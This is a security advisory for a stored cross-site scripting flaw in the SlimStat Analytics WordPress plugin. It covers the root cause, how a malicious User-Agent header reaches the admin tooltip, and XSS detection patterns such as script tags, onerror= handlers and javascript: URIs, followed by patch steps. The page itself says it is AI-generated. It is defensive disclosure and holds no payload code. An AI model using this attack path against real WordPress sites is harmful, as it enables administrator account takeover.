CVE-2026-7634 Overview
CVE-2026-7634 is a Stored Cross-Site Scripting (XSS) vulnerability [CWE-79] in the SlimStat Analytics plugin for WordPress. The flaw affects all versions up to and including 5.4.11. The plugin fails to properly sanitize and escape the User-Agent HTTP header before persisting and rendering it within the WordPress admin interface. Unauthenticated attackers can inject arbitrary JavaScript that executes when a user views the affected report page. Exploitation requires that an administrator explicitly enable the show_complete_user_agent_tooltip setting, which is disabled by default.
Critical Impact
Unauthenticated attackers can inject persistent JavaScript payloads that execute in administrator browsers, enabling session theft, account takeover, and arbitrary actions in the WordPress dashboard.
Affected Products
- SlimStat Analytics plugin for WordPress, versions through 5.4.11
- WordPress sites with the show_complete_user_agent_tooltip setting enabled
- All deployments rendering the SlimStat user-agent tooltip report
Discovery Timeline
- 2026-05-28 - CVE CVE-2026-7634 published to NVD
- 2026-05-28 - Last updated in NVD database
Technical Details for CVE-2026-7634
Vulnerability Analysis
The vulnerability resides in SlimStat Analytics' visitor tracking pipeline. The plugin ingests the User-Agent request header from incoming HTTP traffic and stores it for later display in analytics reports. Because the plugin performs neither sufficient input sanitization on write nor adequate output escaping on render, attacker-controlled markup persists end-to-end through the data flow. Relevant code paths include the tracker Processor.php and Storage.php modules that record visit metadata, and the wp-slimstat-reports.php view that renders the complete user-agent tooltip. When an administrator has enabled the tooltip feature, the stored payload is injected into the report DOM and executed in the administrator's authenticated session context.
Root Cause
The root cause is missing output escaping in the report view that renders the full user-agent string within a tooltip element. Inputs flow from the User-Agent HTTP header through Browscap.php parsing and into persistent storage without HTML-context encoding at the rendering boundary. WordPress functions such as esc_html() or esc_attr() are not applied where the value is reflected in the report markup, allowing arbitrary script content to be parsed by the browser.
Attack Vector
An unauthenticated remote attacker sends an HTTP request to any page tracked by SlimStat with a malicious User-Agent header containing JavaScript payloads. The malicious string is stored in the analytics database. When a logged-in administrator views the SlimStat report that renders the complete user-agent tooltip, the browser parses and executes the attacker's script. Exploitation is conditional on an administrator having enabled show_complete_user_agent_tooltip, which is off by default. See the Wordfence Vulnerability Report and the GitHub Pull Request for technical details.
Detection Methods for CVE-2026-7634
Indicators of Compromise
- HTTP requests carrying User-Agent headers that contain HTML tags, <script> elements, event handlers such as onerror=, or javascript: URIs.
- SlimStat database rows in the visit/browser tables with user-agent values that include angle brackets, quotes, or JavaScript keywords.
- WordPress admin sessions showing unexpected outbound requests originating from /wp-admin/ analytics report pages.
- New or modified administrator accounts created shortly after an admin viewed SlimStat reports.
Detection Strategies
- Inspect web server access logs for inbound requests where the User-Agent header contains characters such as <, >, or strings matching common XSS payload patterns.
- Query the SlimStat database tables for stored user-agent values containing HTML or script tokens and review them as suspect entries.
- Monitor browser console errors and content security policy violations generated when administrators load SlimStat report pages.
Monitoring Recommendations
- Enable a Web Application Firewall (WAF) rule set that inspects and blocks malicious User-Agent header content before requests reach WordPress.
- Alert on administrator account creation, role changes, and plugin configuration modifications originating from the WordPress admin context.
- Audit usage of the SlimStat show_complete_user_agent_tooltip setting across managed sites and flag environments where it is enabled.
How to Mitigate CVE-2026-7634
Immediate Actions Required
- Update the SlimStat Analytics plugin to a version newer than 5.4.11 that includes the fix from GitHub Pull Request #297.
- Disable the show_complete_user_agent_tooltip setting in the SlimStat configuration until the plugin is patched.
- Review stored analytics data and purge user-agent records containing HTML or script content.
- Rotate WordPress administrator credentials and invalidate active sessions if exploitation is suspected.
Patch Information
The maintainers addressed the issue in the SlimStat Analytics repository. Review the GitHub Pull Request for the upstream code change, and consult the Wordfence Vulnerability Report for vendor-confirmed fixed versions. Apply the update through the WordPress plugin manager or via WP-CLI on all affected sites.
Workarounds
- Keep the show_complete_user_agent_tooltip setting disabled, which prevents rendering of the stored payload.
- Deploy a WAF rule that strips or blocks User-Agent headers containing HTML, JavaScript URIs, or event handler attributes.
- Restrict access to the WordPress /wp-admin/ interface by IP allowlist to limit who can trigger payload rendering.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
